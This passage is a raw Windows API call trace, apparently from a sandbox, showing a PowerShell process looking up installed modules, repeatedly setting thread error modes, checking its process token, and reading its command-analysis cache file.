(normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0170.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a880) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a840) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a8d0) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a800) returned 1 [0170.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7c0) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa80) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa40) returned 1 [0170.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xb156f8a340, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0170.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a820) returned 1 [0170.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a790) returned 1 [0170.872] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0170.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a6e0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a610) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a5d0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a6e0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a610) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a5d0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a6f0) returned 1 [0170.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a6b0) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a740) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a670) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a630) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a880) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a840) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a8d0) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a800) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7c0) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa80) returned 1 [0170.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa40) returned 1 [0170.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xb156f8a340, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0170.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a820) returned 1 [0170.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a790) returned 1 [0170.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aba0) returned 1 [0170.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ab60) returned 1 [0170.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8abf0) returned 1 [0170.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ab20) returned 1 [0170.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aae0) returned 1 [0170.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ab90) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aac0) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa80) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ab90) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aac0) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa80) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.974] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144c830 [0170.974] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144c830 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0170.974] CoTaskMemFree (pv=0x1e35144c830) [0170.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8a820, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0170.974] GetCurrentProcess () returned 0xffffffffffffffff [0170.975] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8ad68 | out: TokenHandle=0xb156f8ad68*=0x458) returned 1 [0170.975] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8ae68 | out: TokenInformation=0x0, ReturnLength=0xb156f8ae68) returned 0 [0170.975] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d65d0 [0170.975] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x1e3513d65d0, TokenInformationLength=0x2c, ReturnLength=0xb156f8ae68 | out: TokenInformation=0x1e3513d65d0, ReturnLength=0xb156f8ae68) returned 1 [0170.976] LocalFree (hMem=0x1e3513d65d0) returned 0x0 [0170.976] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e339695220, cbSid=0xb156f8ae60 | out: pSid=0x1e339695220*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8ae60) returned 1 [0170.977] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8ad00*=0x730, lpdwindex=0xb156f8aad4 | out: lpdwindex=0xb156f8aad4) returned 0x0 [0170.978] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8a770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0170.978] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8aca0 | out: lpFileInformation=0xb156f8aca0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0170.978] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8a620, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0170.978] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0170.978] GetFileType (hFile=0x45c) returned 0x1 [0170.978] GetFileType (hFile=0x45c) returned 0x1 [0170.979] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969ba88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a968, lpOverlapped=0x0 | out: lpBuffer=0x1e33969ba88*, lpNumberOfBytesRead=0xb156f8a968*=0x1000, lpOverlapped=0x0) returned 1 [0170.983] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969d85b, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8a608, lpOverlapped=0x0 | out: lpBuffer=0x1e33969d85b*, lpNumberOfBytesRead=0xb156f8a608*=0x28, lpOverlapped=0x0) returned 1 [0170.983] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969ba88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a5d8, lpOverlapped=0x0 | out: lpBuffer=0x1e33969ba88*, lpNumberOfBytesRead=0xb156f8a5d8*=0x1000, lpOverlapped=0x0) returned 1 [0170.986] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969d887, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8a608, lpOverlapped=0x0 | out: lpBuffer=0x1e33969d887*, lpNumberOfBytesRead=0xb156f8a608*=0x14, lpOverlapped=0x0) returned 1 [0170.986] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969ba88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a5d8, lpOverlapped=0x0 | out: lpBuffer=0x1e33969ba88*, lpNumberOfBytesRead=0xb156f8a5d8*=0x1000, lpOverlapped=0x0) returned 1 [0170.987] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969d84a, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8a608, lpOverlapped=0x0 | out: lpBuffer=0x1e33969d84a*, lpNumberOfBytesRead=0xb156f8a608*=0x2f, lpOverlapped=0x0) returned 1 [0170.987] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969ba88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a5d8, lpOverlapped=0x0 | out: lpBuffer=0x1e33969ba88*, lpNumberOfBytesRead=0xb156f8a5d8*=0x1000, lpOverlapped=0x0) returned 1 [0170.987] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969d810, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8a598, lpOverlapped=0x0 | out: lpBuffer=0x1e33969d810*, lpNumberOfBytesRead=0xb156f8a598*=0x17, lpOverlapped=0x0) returned 1 [0170.987] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969ba88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a638, lpOverlapped=0x0 | out: lpBuffer=0x1e33969ba88*, lpNumberOfBytesRead=0xb156f8a638*=0xd58, lpOverlapped=0x0) returned 1 [0170.987] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33969ba88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a938, lpOverlapped=0x0 | out: lpBuffer=0x1e33969ba88*, lpNumberOfBytesRead=0xb156f8a938*=0x0, lpOverlapped=0x0) returned 1 [0170.987] CloseHandle (hObject=0x45c) returned 1 [0170.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0xb156f8a900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0170.988] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1e3396a89b0 | out: lpFileInformation=0x1e3396a89b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8)) returned 1 [0170.988] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8a7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0170.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8acf0 | out: lpFileInformation=0xb156f8acf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0170.989] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8a670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0170.989] CreateFileW 